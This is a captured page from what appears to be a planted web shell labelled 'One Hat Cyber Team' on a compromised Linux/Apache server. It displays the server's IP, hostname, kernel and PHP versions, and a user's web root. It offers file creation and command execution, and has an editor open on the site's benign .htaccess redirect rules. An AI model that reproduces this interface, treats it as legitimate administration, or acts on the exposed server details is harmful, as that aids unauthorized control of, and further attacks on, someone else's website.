One Hat Cyber Team
Your IP :
216.73.216.4
Server IP :
162.240.106.28
Server :
Linux server.ganesand.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
Server Software :
Apache
PHP Version :
8.0.30
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
thoa
/
public_html
/
Edit File:
.htaccess
# php -- BEGIN cPanel-generated handler, do not edit # Set the “ea-php80” package as the default “PHP” programming language. <IfModule mime_module> AddHandler application/x-httpd-ea-php80 .php .php8 .phtml </IfModule> # php -- END cPanel-generated handler, do not edit RewriteCond %{HTTP_HOST} ^thoa.in$ RewriteRule ^(.*)$ http://www.thoa.in/$1 [R=301,L] # Replace altthoa.in and thoa.in with the real domain name # This example is for making a pseudo park, making some addon domain appear as the primary, etc # As above, swap altthoa.in and thoa.in between the 3 lines to have it do the reverse RewriteCond %{HTTP_HOST} ^altthoa.in$ [OR] RewriteCond %{HTTP_HOST} ^www.altthoa.in$ RewriteRule ^(.*)$ http://www.thoa.in/$1 [R=301,L] # For those that care, the $1 at the end will make sure that all links on the site work and appear as the thoa.in instead of as the altthoa.in RewriteEngine On RewriteCond %{HTTP_HOST} !^www\. [NC] RewriteRule ^(.*) http://www.%{HTTP_HOST}/$1 [R=301,QSA,L]
Simpan